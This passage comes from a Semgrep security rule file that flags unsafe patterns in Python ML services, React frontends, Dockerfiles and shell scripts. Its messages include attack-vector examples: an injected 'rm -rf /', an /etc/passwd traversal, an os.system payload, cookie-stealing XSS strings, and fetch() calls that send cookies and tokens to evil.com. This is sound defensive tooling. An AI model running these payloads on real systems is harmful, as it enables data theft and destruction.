        # TensorFlow
        model.save("model", save_format="tf")  # SavedModel format

        # scikit-learn
        joblib.dump(model, "model.joblib", compress=3)  # Still uses pickle
        # Better: Convert to ONNX with skl2onnx

        # ONNX (universal)
        import onnx
        onnx.save(model, "model.onnx")
    patterns:
      - pattern-either:
          - pattern: pickle.load($FILE)
          - pattern: pickle.loads($DATA)
          - pattern: pickle.Unpickler($FILE)
          - pattern: joblib.load($FILE)
    metadata:
      cwe: "CWE-502"
      owasp: "A08:2021 - Software and Data Integrity Failures"
      category: "security"
      references:
        - "https://github.com/onnx/onnx"
        - "https://pytorch.org/docs/stable/jit.html"

  - id: python-yaml-unsafe-load
    languages: [python]
    severity: ERROR
    message: |
      yaml.load() without safe loader - arbitrary code execution (CWE-502).

      Attack Vector: yaml.load() can instantiate arbitrary Python objects and execute code.

      Remediation: Use yaml.safe_load() instead:
        import yaml
        data = yaml.safe_load(file)  # Safe - only parses basic YAML types
    patterns:
      - pattern-either:
          - pattern: yaml.load($INPUT)
          - pattern: yaml.load($INPUT, Loader=yaml.Loader)
          - pattern: yaml.load($INPUT, Loader=yaml.FullLoader)
      - pattern-not: yaml.load($INPUT, Loader=yaml.SafeLoader)
    metadata:
      cwe: "CWE-502"
      category: "security"

  - id: python-shell-injection-subprocess
    languages: [python]
    severity: ERROR
    message: |
      Command injection via subprocess with shell=True (CWE-78).

      Attack Vector: User input in shell command enables arbitrary command execution:
        subprocess.run(f"convert {user_file}.png output.jpg", shell=True)
        # Input: "file.png; rm -rf /" would delete files

      Remediation: Use shell=False with list arguments:
        subprocess.run(["convert", f"{user_file}.png", "output.jpg"], shell=False)
        # Safe - no shell interpretation, input is treated as literal argument
    patterns:
      - pattern-either:
          - pattern: subprocess.run(..., shell=True)
          - pattern: subprocess.Popen(..., shell=True)
          - pattern: subprocess.call(..., shell=True)
          - pattern: subprocess.check_output(..., shell=True)
    metadata:
      cwe: "CWE-78"
      owasp: "A03:2021 - Injection"
      category: "security"

  - id: python-os-system
    languages: [python]
    severity: ERROR
    message: |
      Command injection via os.system() (CWE-78).

      os.system() always uses shell and is vulnerable to injection.

      Remediation: Use subprocess.run() with shell=False:
        subprocess.run(["command", "arg1", "arg2"], shell=False)
    patterns:
      - pattern: os.system($CMD)
      - pattern-not: os.system("...")
    metadata:
      cwe: "CWE-78"
      owasp: "A03:2021 - Injection"
      category: "security"

  - id: python-path-traversal-open
    languages: [python]
    severity: ERROR
    message: |
      Path traversal vulnerability (CWE-22).

      Attack Vector: User-controlled file paths can access restricted files:
        open(user_provided_path)
        # Input: "../../../../etc/passwd" could leak system files

      Remediation: Validate and sanitize file paths:
        import os
        safe_path = os.path.normpath(user_provided_path)
        if not safe_path.startswith(ALLOWED_DIR):
            raise ValueError("Path traversal detected")
        open(safe_path)
    patterns:
      - pattern-either:
          - pattern: open($PATH, ...)
          - pattern: Path($PATH)
          - pattern: pathlib.Path($PATH)
      - metavariable-pattern:
          metavariable: $PATH
          patterns:
            - pattern-not: "..."  # Exclude literal strings
    metadata:
      cwe: "CWE-22"
      owasp: "A01:2021 - Broken Access Control"
      category: "security"

  - id: python-hardcoded-password
    languages: [python]
    severity: ERROR
    message: |
      Hardcoded password/secret detected (CWE-798).

      Security Risk: Credentials in source code are visible in git history and container images.

      Remediation: Use environment variables:
        import os
        password = os.getenv("DATABASE_PASSWORD")
        if not password:
            raise ValueError("DATABASE_PASSWORD not set")
    patterns:
      - pattern-either:
          - pattern: password = $VALUE
          - pattern: PASSWORD = $VALUE
          - pattern: api_key = $VALUE
          - pattern: API_KEY = $VALUE
          - pattern: secret = $VALUE
          - pattern: SECRET = $VALUE
          - pattern: token = $VALUE
          - pattern: TOKEN = $VALUE
      - metavariable-pattern:
          metavariable: $VALUE
          patterns:
            - pattern-regex: |-
                ["'][^"']{8,}["']
    metadata:
      cwe: "CWE-798"
      owasp: "A07:2021 - Identification and Authentication Failures"
      category: "security"

  - id: python-flask-debug-mode-production
    languages: [python]
    severity: WARNING
    message: |
      Flask debug mode enabled (potential production issue).

      Security Risk: Debug mode exposes:
        - Interactive Python debugger (code execution via web interface)
        - Detailed error messages with source code
        - Automatic code reloading

      Remediation: Never enable debug mode in production:
        app.run(debug=False)  # Production
        # Or control via environment variable:
        app.run(debug=os.getenv("FLASK_DEBUG", "false") == "true")
    pattern: app.run(..., debug=True, ...)
    metadata:
      category: "security"

  - id: python-sql-alchemy-text-injection
    languages: [python]
    severity: ERROR
    message: |
      SQL injection via SQLAlchemy text() without parameterization (CWE-89).

      Attack Vector: String concatenation in text() bypasses ORM protections:
        db.execute(text(f"SELECT * FROM users WHERE id = {user_id}"))

      Remediation: Use parameterized queries:
        db.execute(text("SELECT * FROM users WHERE id = :id"), {"id": user_id})
    patterns:
      - pattern-either:
          - pattern: text(f"...")
          - pattern: text("..." + ...)
          - pattern: text("...".format(...))
    metadata:
      cwe: "CWE-89"
      category: "security"

  - id: python-pandas-eval-query
    languages: [python]
    severity: WARNING
    message: |
      pandas.eval() or DataFrame.query() with user input - potential code injection.

      Attack Vector: User-controlled expressions can execute arbitrary code:
        df.query(user_input)  # Input: "__import__('os').system('...')"

      Remediation: Validate input against allowlist of safe column names and operators:
        SAFE_COLUMNS = {"price", "quantity", "total"}
        if not all(col in SAFE_COLUMNS for col in extract_columns(user_query)):
            raise ValueError("Invalid column")
        df.query(user_query)
    patterns:
      - pattern-either:
          - pattern: pd.eval($EXPR)
          - pattern: pandas.eval($EXPR)
          - pattern: $DF.eval($EXPR)
          - pattern: $DF.query($EXPR)
    metadata:
      cwe: "CWE-94"
      category: "security"

  - id: python-huggingface-trust-remote-code
    languages: [python]
    severity: WARNING
    message: |
      trust_remote_code=True enables arbitrary code execution from model repos (CWE-829).

      Attack Vector: HuggingFace models with trust_remote_code=True download and execute
      arbitrary Python code from the model repository. A malicious model can:
        - Execute shell commands on the serving infrastructure
        - Exfiltrate data and credentials
        - Install backdoors or cryptominers

      RHOAI Impact: Affects Caikit, vLLM, and any service loading HuggingFace models.

      Remediation:
        - Use trust_remote_code=False (default since transformers 4.0+)
        - Pin model commits to verified revisions
        - Use model scanning tools (ModelScan, Safetensors)
        - If trust_remote_code=True is required, add justification comment:
          # nosemgrep: python-huggingface-trust-remote-code - Model X requires custom code
    patterns:
      - pattern-either:
          - pattern: AutoModel.from_pretrained(..., trust_remote_code=True, ...)
          - pattern: AutoTokenizer.from_pretrained(..., trust_remote_code=True, ...)
          - pattern: AutoModelForCausalLM.from_pretrained(..., trust_remote_code=True, ...)
          - pattern: AutoModelForSeq2SeqLM.from_pretrained(..., trust_remote_code=True, ...)
          - pattern: pipeline(..., trust_remote_code=True, ...)
    metadata:
      cwe: "CWE-829"
      owasp: "A08:2021 - Software and Data Integrity Failures"
      category: "security"
      references:
        - "https://huggingface.co/docs/transformers/main/en/autoclass_tutorial"

  - id: python-torch-load-unsafe
    languages: [python]
    severity: WARNING
    message: |
      torch.load() without weights_only=True - arbitrary code execution via pickle (CWE-502).

      Attack Vector: PyTorch uses pickle internally. A malicious .pt/.pth file can execute
      arbitrary code during deserialization:
        model = torch.load("malicious_model.pt")  # Executes hidden payload

      RHOAI Impact: KServe, ModelMesh, and inference services loading user-uploaded models.

      Remediation: Use weights_only=True (PyTorch 2.0+):
        model = torch.load("model.pt", weights_only=True)

      For training checkpoints that need full state:
        - Validate source is trusted (internal model registry, not user uploads)
        - Use Safetensors format instead: safetensors.torch.load_file("model.safetensors")
        - Add justification: # nosemgrep: python-torch-load-unsafe - internal trusted source
    patterns:
      - pattern: torch.load(...)
      - pattern-not: torch.load(..., weights_only=True, ...)
    metadata:
      cwe: "CWE-502"
      owasp: "A08:2021 - Software and Data Integrity Failures"
      category: "security"
      references:
        - "https://pytorch.org/docs/stable/generated/torch.load.html"

  - id: python-unsafe-deserialization-dill-cloudpickle
    languages: [python]
    severity: INFO
    message: |
      Unsafe deserialization via dill/cloudpickle/shelve (CWE-502).

      Attack Vector: Like pickle, these libraries can execute arbitrary code during
      deserialization. A malicious serialized object can compromise the service.

      Context: dill and cloudpickle are commonly used in distributed ML frameworks
      (Ray, Dask) for internal task serialization. This is generally safe when
      deserializing data from trusted internal sources (Ray workers, Dask scheduler).

      Risk: HIGH when deserializing user-provided or externally-sourced data.
      Risk: LOW when used for internal framework communication.

      Remediation:
        - Never deserialize data from untrusted sources
        - For internal framework use, add justification comment:
          # nosemgrep: python-unsafe-deserialization-dill-cloudpickle - internal Ray serialization
    patterns:
      - pattern-either:
          - pattern: dill.load(...)
          - pattern: dill.loads(...)
          - pattern: cloudpickle.load(...)
          - pattern: cloudpickle.loads(...)
          - pattern: shelve.open(...)
    metadata:
      cwe: "CWE-502"
      owasp: "A08:2021 - Software and Data Integrity Failures"
      category: "security"

  - id: python-ssl-verify-disabled
    languages: [python]
    severity: WARNING
    message: |
      SSL/TLS certificate verification disabled (CWE-295).

      Attack Vector: verify=False disables certificate validation, enabling
      Man-in-the-Middle attacks. Attacker can intercept and modify traffic
      including credentials, model data, and API responses.

      Context: In Kubernetes with Istio service mesh, internal service calls
      may legitimately use verify=False since mTLS is handled at the proxy layer.
      This is UNSAFE for external API calls (HuggingFace, S3, external services).

      Remediation:
        - For external APIs: Use verify=True (default) with proper CA certificates
        - For internal services with service mesh: Document the architectural decision
          # nosemgrep: python-ssl-verify-disabled - internal mTLS via Istio
        - For custom CAs: Point to CA bundle: verify="/path/to/ca-bundle.crt"
    patterns:
      - pattern-either:
          - pattern: requests.get(..., verify=False, ...)
          - pattern: requests.post(..., verify=False, ...)
          - pattern: requests.put(..., verify=False, ...)
          - pattern: requests.delete(..., verify=False, ...)
          - pattern: requests.patch(..., verify=False, ...)
          - pattern: httpx.Client(..., verify=False, ...)
          - pattern: httpx.AsyncClient(..., verify=False, ...)
    paths:
      exclude:
        - "**/tests/**"
        - "**/*_test.py"
        - "**/test_*.py"
    metadata:
      cwe: "CWE-295"
      owasp: "A02:2021 - Cryptographic Failures"
      category: "security"

  - id: python-grpc-insecure-channel
    languages: [python]
    severity: INFO
    message: |
      gRPC insecure channel - no TLS encryption (CWE-319).

      Attack Vector: grpc.insecure_channel() transmits data in plaintext,
      enabling eavesdropping and tampering.

      Context: In Kubernetes with service mesh (Istio/Envoy), internal gRPC calls
      often use insecure channels since mTLS is handled at the sidecar proxy layer.
      This is standard for KServe, ModelMesh, and internal model serving.

      Risk: HIGH for external/egress gRPC calls outside the cluster.
      Risk: LOW for internal cluster communication with service mesh.

      Remediation:
        - External calls: Use grpc.secure_channel() with proper credentials
        - Internal calls with service mesh: Document the decision
          # nosemgrep: python-grpc-insecure-channel - Istio mTLS handles encryption
    pattern: grpc.insecure_channel(...)
    metadata:
      cwe: "CWE-319"
      category: "security"

  # ==========================================================================
  # SECTION 7: TYPESCRIPT / JAVASCRIPT SECURITY — React Frontends
  # ==========================================================================

  - id: ts-react-dangerous-html-no-sanitization
    languages: [typescript, javascript]
    severity: ERROR
    message: |
      XSS vulnerability via dangerouslySetInnerHTML without sanitization (CWE-79).

      Attack Vector: User-controlled HTML rendered without sanitization:
        <div dangerouslySetInnerHTML={{ __html: userComment }} />
        // userComment: "<img src=x onerror='alert(document.cookie)'>"

      Impact: Attacker can:
        - Steal session tokens via document.cookie
        - Perform actions as victim user (CSRF)
        - Redirect to phishing sites
        - Inject keyloggers

      Remediation: Sanitize HTML with DOMPurify before rendering:
        import DOMPurify from 'dompurify';

        <div dangerouslySetInnerHTML={{
          __html: DOMPurify.sanitize(userComment, {
            ALLOWED_TAGS: ['p', 'b', 'i', 'em', 'strong', 'a'],
            ALLOWED_ATTR: ['href']
          })
        }} />
    patterns:
      - pattern: |
          <$EL dangerouslySetInnerHTML={{__html: $HTML}} />
      - pattern-not: |
          <$EL dangerouslySetInnerHTML={{__html: DOMPurify.sanitize(...)}} />
    metadata:
      cwe: "CWE-79"
      owasp: "A03:2021 - Injection"
      category: "security"

  - id: ts-react-href-javascript-protocol
    languages: [typescript, javascript]
    severity: ERROR
    message: |
      XSS vulnerability via javascript: protocol in href (CWE-79).

      Attack Vector: User-controlled href with javascript: protocol executes arbitrary code:
        <a href={userUrl}>Click me</a>
        // userUrl: "javascript:alert(document.cookie)"

      Remediation: Validate URLs and block javascript: protocol:
        const isSafeUrl = (url: string) => {
          return url.startsWith('http://') || url.startsWith('https://') || url.startsWith('/');
        };

        {isSafeUrl(userUrl) && <a href={userUrl}>Click me</a>}
    patterns:
      - pattern: |
          <$EL href={$URL} ...>
            ...
          </$EL>
      - metavariable-pattern:
          metavariable: $URL
          patterns:
            - pattern-not: '"..."'  # Exclude literal strings
    metadata:
      cwe: "CWE-79"
      owasp: "A03:2021 - Injection"
      category: "security"

  - id: ts-eval-injection
    languages: [typescript, javascript]
    severity: ERROR
    message: |
      Code injection via eval() (CWE-94).

      Attack Vector: eval() executes arbitrary JavaScript:
        eval(userInput)  // Input: "fetch('https://evil.com?cookies='+document.cookie)"

      Remediation: Never use eval() with user input.
        - For JSON: Use JSON.parse()
        - For dynamic property access: Use bracket notation obj[prop]
        - For dynamic function calls: Use Function constructor (with extreme caution)
    pattern: eval($INPUT)
    metadata:
      cwe: "CWE-94"
      owasp: "A03:2021 - Injection"
      category: "security"

  - id: ts-function-constructor-injection
    languages: [typescript, javascript]
    severity: WARNING
    message: |
      Code injection via Function constructor.

      Similar to eval(), Function constructor can execute arbitrary code:
        new Function(userCode)()

      Remediation: Avoid dynamic code execution. Use safe alternatives.
    pattern: new Function($CODE)
    metadata:
      cwe: "CWE-94"
      category: "security"

  - id: ts-localstorage-sensitive-data
    languages: [typescript, javascript]
    severity: WARNING
    message: |
      Sensitive data stored in localStorage (CWE-922).

      Security Risks:
        1. localStorage is accessible to ALL scripts on same origin (XSS can steal it)
        2. Data persists indefinitely (even after browser close)
        3. No httpOnly protection (accessible via JavaScript)
        4. No secure flag (transmitted over HTTP if page downgrades)

      Attack Vector: XSS exploit reads localStorage:
        fetch('https://evil.com?token=' + localStorage.getItem('token'))

      Remediation: Use httpOnly secure cookies for sensitive data:
        Set-Cookie: session=...; HttpOnly; Secure; SameSite=Strict

        Cookies with httpOnly cannot be accessed by JavaScript (XSS protection).
    patterns:
      - pattern-either:
          - pattern: localStorage.setItem("token", ...)
          - pattern: localStorage.setItem("password", ...)
          - pattern: localStorage.setItem("apiKey", ...)
          - pattern: localStorage.setItem("secret", ...)
          - pattern: localStorage.setItem("jwt", ...)
          - pattern: localStorage.setItem("auth", ...)
    metadata:
      cwe: "CWE-922"
      owasp: "A02:2021 - Cryptographic Failures"
      category: "security"

  - id: ts-regex-denial-of-service
    languages: [typescript, javascript]
    severity: INFO
    message: |
      Potentially vulnerable regex - possible ReDoS (CWE-1333).

      Vulnerable pattern detected: Nested quantifiers like (a+)+ or (a*)*
      Review if user-controlled input can reach this regex.

      Attack Vector: Malicious input causes exponential backtracking:
        /^(a+)+$/.test('a'.repeat(50) + 'b')  // Takes minutes to fail

      Remediation: Simplify regex or use timeout:
        - Avoid nested quantifiers: /^a+$/ instead of /^(a+)+$/
        - Use atomic groups if available
        - Set regex timeout in Node.js (not supported in browser)
    pattern-regex: '\([^)]*[+*]\)[+*{]'
    metadata:
      cwe: "CWE-1333"
      owasp: "A06:2021 - Vulnerable and Outdated Components"
      category: "security"

  - id: ts-postmessage-no-origin-check
    languages: [typescript, javascript]
    severity: ERROR
    message: |
      postMessage listener without origin validation (CWE-942).

      Attack Vector: Malicious iframe sends messages to steal data or trigger actions:
        window.addEventListener('message', (event) => {
          processCommand(event.data);  // No origin check!
        });

      Remediation: Validate message origin:
        window.addEventListener('message', (event) => {
          if (event.origin !== 'https://trusted-domain.com') {
            return;  // Reject messages from untrusted origins
          }
          processCommand(event.data);
        });
    patterns:
      - pattern: |
          window.addEventListener('message', ($EVENT) => {
            ...
          })
      - pattern-not-inside: |
          if ($EVENT.origin === ...) {
            ...
          }
      - pattern-not-inside: |
          if ($EVENT.origin !== ...) {
            return;
          }
    metadata:
      cwe: "CWE-942"
      category: "security"

  # ==========================================================================
  # SECTION 8: DOCKERFILE SECURITY
  # ==========================================================================

  - id: dockerfile-latest-tag
    languages: [dockerfile]
    severity: WARNING
    message: |
      Using 'latest' tag is not recommended for reproducibility.

      The :latest tag is mutable and can point to different images over time,
      causing builds to be non-reproducible and potentially introducing
      breaking changes or vulnerabilities.

      Remediation: Pin to a specific version:
        FROM registry/image:v1.2.3
    pattern-regex: 'FROM\s+[^:]+:latest'
    metadata:
      category: "security"

  - id: dockerfile-secret-in-env
    languages: [dockerfile]
    severity: ERROR
    message: |
      Hardcoded secret in Dockerfile ENV instruction (CWE-798).

      ENV values are baked into image layers and visible via:
        - docker history
        - docker inspect
        - Container runtime metadata

      Remediation: Use build args with --secret flag (BuildKit) or runtime env vars:
        # Build-time: docker build --secret id=mysecret,src=secret.txt
        RUN --mount=type=secret,id=mysecret cat /run/secrets/mysecret
    pattern-regex: 'ENV\s+(PASSWORD|SECRET|TOKEN|API_KEY)\s*=\s*.+'
    metadata:
      cwe: "CWE-798"
      category: "security"

  # ==========================================================================
  # SECTION 9: SHELL SCRIPT SECURITY
  # ==========================================================================

  - id: shell-eval-injection
    languages: [bash, sh]
    severity: ERROR
    message: |
      Use of 'eval' is dangerous and can lead to code injection (CWE-94).

      eval executes its arguments as a shell command, which can be exploited
      if any part of the input comes from untrusted sources.

      Remediation: Avoid eval. Use arrays for dynamic commands:
        # Instead of: eval "$cmd"
        # Use: "${cmd_array[@]}"
    pattern-regex: 'eval\s+'
    metadata:
      cwe: "CWE-94"
      category: "security"

  - id: shell-unquoted-var-in-dangerous-cmd
    languages: [bash, sh]
    severity: ERROR
    message: |
      Unquoted variable in dangerous command - potential command injection (CWE-78).

      Unquoted variables in commands like rm, cp, mv, chmod, chown, kill undergo
      word splitting and glob expansion. A filename with spaces or special characters
      can cause unintended behavior or arbitrary file operations.

      Remediation: Always quote variables in file operations:
        rm "$FILE"         # correct
        rm $FILE           # dangerous
    pattern-regex: '(rm|cp|mv|eval|chmod|chown|kill|pkill)\s+[^|;]*(?<!["''\\])\$(?:\{[A-Za-z_][A-Za-z0-9_]*(?:[:\-\+\?=][^}]*)?\}|[A-Za-z_][A-Za-z0-9_]*)'
    metadata:
      cwe: "CWE-78"
      category: "security"